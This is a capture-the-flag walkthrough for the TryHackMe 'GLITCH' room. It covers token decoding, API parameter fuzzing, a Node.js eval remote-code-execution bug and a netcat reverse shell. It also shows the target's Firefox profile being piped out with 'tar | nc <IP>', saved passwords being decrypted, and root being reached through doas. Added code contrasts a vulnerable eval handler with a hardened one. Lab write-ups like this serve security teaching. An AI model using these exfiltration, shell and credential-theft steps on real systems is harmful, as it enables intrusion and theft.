Prior to completing this room, I recommend you get familiar with:
- How APIs work, HTTP requests and methods
- Burpsuite or OWASP ZAP
- Privilege escalation
Enumeration & setup
To start off, we’ll add the machine’s IP address to the “/etc/hosts” file.
Next, let’s do some enumeration with Nmap to see what we’re working with.
Nothing interesting shows up: only port 80 (the web server) is open, so let’s check it out.
Getting an access token
Again, nothing interesting here, but notice that the page title says “not allowed”, hinting that we need an access token before doing anything else, as the TryHackMe page mentions.
Before looking at how to get the token, I was curious and wanted to check the local storage and cookies for the page.
And sure enough, there was a token cookie with no value. So once we get our access token, we’ll paste it in the cookie’s value field.
Taking a look at the page’s source, we find an interesting function called “getAcess”.
So let’s head to the console and call it to get our access token.
If you haven’t noticed, the value returned is base64 encoded, so we have to decode it to get the actual access token.
There are many ways to do this, but the easiest is in your terminal:
echo "encoded token" | base64 -d
If the encoded string is not padded to a multiple of four characters, GNU base64 -d will complain about invalid input; append “=” until the length is a multiple of four (or check that the printed text is complete) before using it. Don’t forget to update your token cookie with the decoded string and reload the page.
Finding the first flag
Now we see a different web page after updating the cookie.
There’s nothing interesting on the page itself, but looking at the source code I found a JavaScript file containing a link to an API endpoint.
Since we don’t know which parameters the API accepts, we can fuzz parameter names and look for one that produces a different response.
There are multiple ways to do this, but I’ll do it using gobuster.
gobuster fuzz -m POST -u "http://glitch.thm/api/items?FUZZ=test" -w Seclists/Discovery/Web-Content/api/objects.txt
One of the responses stands out, which is when we call the API using the “cmd” parameter.
So we’ll create a POST request to see the response.
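As an added example (not part of the original write-up and not the room’s tooling), here is the parameter-name fuzzing the gobuster command performs, written out so the selection logic is visible: request a baseline with a name that certainly does not exist, try each candidate name as a POST query parameter, and report anything whose status code or response length differs from the baseline. The network call is injected as `send`, and the candidate list and `fakeSend` responder are constructed stand-ins for SecLists and the target, so the script runs offline; the real server’s messages are not reproduced.

```javascript
// Candidate parameter names: a short, constructed stand-in for
// SecLists Discovery/Web-Content/api/objects.txt.
const CANDIDATES = ["id", "name", "user", "cmd", "query", "item"];

// Try each candidate as `?NAME=test` and return those whose response differs
// from the baseline. `send(method, url)` must resolve to { status, body }.
async function fuzzParams(baseUrl, candidates, send, method = "POST") {
  // Baseline: a parameter name that is very unlikely to be recognised.
  const baseline = await send(method, `${baseUrl}?zzzznotaparam=test`);
  const hits = [];
  for (const name of candidates) {
    const r = await send(method, `${baseUrl}?${encodeURIComponent(name)}=test`);
    // gobuster-style filter: a changed status code or response length
    // means the server treated this name differently.
    if (r.status !== baseline.status || r.body.length !== baseline.body.length) {
      hits.push({ name, status: r.status, length: r.body.length });
    }
  }
  return hits;
}

// Constructed responder standing in for the target (an assumption made only so
// the example runs offline): unknown parameters get one canned reply, while a
// POST carrying `cmd` gets a different one, as an engine error message would.
async function fakeSend(method, url) {
  const params = new URL(url).searchParams;
  if (method === "POST" && params.has("cmd")) {
    return { status: 200, body: "ReferenceError: test is not defined" };
  }
  return { status: 200, body: "invalid" };
}

// Usage: the hostname is the one used in the write-up; swap fakeSend for a
// real fetch-based sender against a live target.
fuzzParams("http://glitch.thm/api/items", CANDIDATES, fakeSend)
  .then((hits) => console.log(hits));
```

Against a real target the comparison should also tolerate responses that legitimately vary in length (timestamps, request IDs); a per-name repeat of the baseline, or excluding a known length as gobuster’s filters do, avoids chasing noise.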
The response shows that the value of “cmd” is being evaluated by Node.js, so a quick Google search for something along the lines of “nodejs eval remote code exec” will give you several reverse-shell payloads you can use.
To deliver it, I’ll use Burpsuite, modify the payload with my IP address and listener port, and URL-encode it.
First of all, start a netcat listener.
nc -lvnp 4444
Then start Burpsuite and intercept a request to the API. To modify it and resend it, we’ll send the captured request to Repeater.
All we need to do now is replace the value passed in the “cmd” parameter with our payload and change the method to POST.
After pasting your exploit in and modifying it, make sure to URL-encode it by selecting it and doing “right click -> Convert selection -> URL -> URL-encode key characters”.
Send the request and you should catch a reverse shell on the listener.
The first flag is easy to find: it’s in the user’s home directory.
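To make the bug class behind the “cmd” parameter concrete, here is an added example that is not the room’s source code: a request handler that passes an attacker-controlled query value straight to `eval()`, beside a hardened version that only dispatches to a fixed set of named operations. It also shows why the payload has to be URL-encoded before it goes into the query string. The item list, operation names and hostname are assumptions made for illustration.

```javascript
const ITEMS = ["glitch", "token", "flag"]; // constructed sample data

// Vulnerable: whatever arrives in ?cmd= is executed as JavaScript with the
// server's privileges, and engine errors are echoed back (which is what
// reveals the eval sink during fuzzing). Illustrative only, not the real app.
function itemsHandlerVulnerable(query) {
  if (query.cmd === undefined) return { status: 400, body: "missing cmd" };
  try {
    return { status: 200, body: String(eval(query.cmd)) }; // RCE sink
  } catch (e) {
    return { status: 500, body: `${e.name}: ${e.message}` }; // leaks the engine
  }
}

// Hardened: the client chooses an operation name, never code. An own-property
// check keeps names like "constructor" from reaching Object.prototype.
const OPERATIONS = {
  list: () => ITEMS.join(","),
  count: () => String(ITEMS.length),
};
function itemsHandlerHardened(query) {
  const known = Object.prototype.hasOwnProperty.call(OPERATIONS, query.cmd);
  if (!known) return { status: 400, body: "unknown operation" };
  return { status: 200, body: OPERATIONS[query.cmd]() };
}

// Why the payload is URL-encoded: a raw '&' ends the parameter and a raw '+'
// becomes a space when the query string is parsed, so the code eval() sees
// is not the code you sent. encodeURIComponent makes it round-trip intact.
function buildQuery(cmd) {
  return `cmd=${encodeURIComponent(cmd)}`;
}
function parseQuery(qs) {
  return Object.fromEntries(new URLSearchParams(qs));
}

// Usage: the same expression against both handlers.
const probe = { cmd: "'x'.repeat(3)" };
console.log(itemsHandlerVulnerable(probe)); // executes the expression
console.log(itemsHandlerHardened(probe));   // rejects it
console.log(buildQuery("require('child_process')")); // what Burp's encoder produces
```

The hardened handler is the shape of the fix: treat the parameter as data selecting a server-defined action, and never hand request input to `eval`, `Function`, `vm.runInThisContext` or similar.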
Finding the last flag
I upgraded to an interactive TTY before moving on; this step is optional.
python -c "import pty;pty.spawn('/bin/bash')"
(Use python3 if python is not installed on the target.)
After some digging around, the only interesting thing I found was a hidden Firefox profile directory (.firefox).
Let’s transfer it to our machine. There are multiple ways to do this, but this is the simplest.
On your machine, start a new listener that unpacks whatever it receives (with traditional netcat the syntax is nc -l -p 8888):
nc -l 8888 | tar xf -
On the GLITCH box:
cd .firefox
tar cf - . | nc <IP> 8888
Again, there are multiple ways to recover saved passwords from the Firefox profile files (logins.json and key4.db), but I used firefox_decrypt.
After switching to the user v0id with the recovered password, we check what privileges we have with “sudo -l”, but as the room’s hint suggests, sudo can’t be used.
So I did some digging with find (looking for setuid binaries, for example).
And sure enough, we see “doas”, a sudo alternative; its rules live in /etc/doas.conf, which tells you what v0id is permitted to run as root, and it gives a very easy privesc to root and the final flag.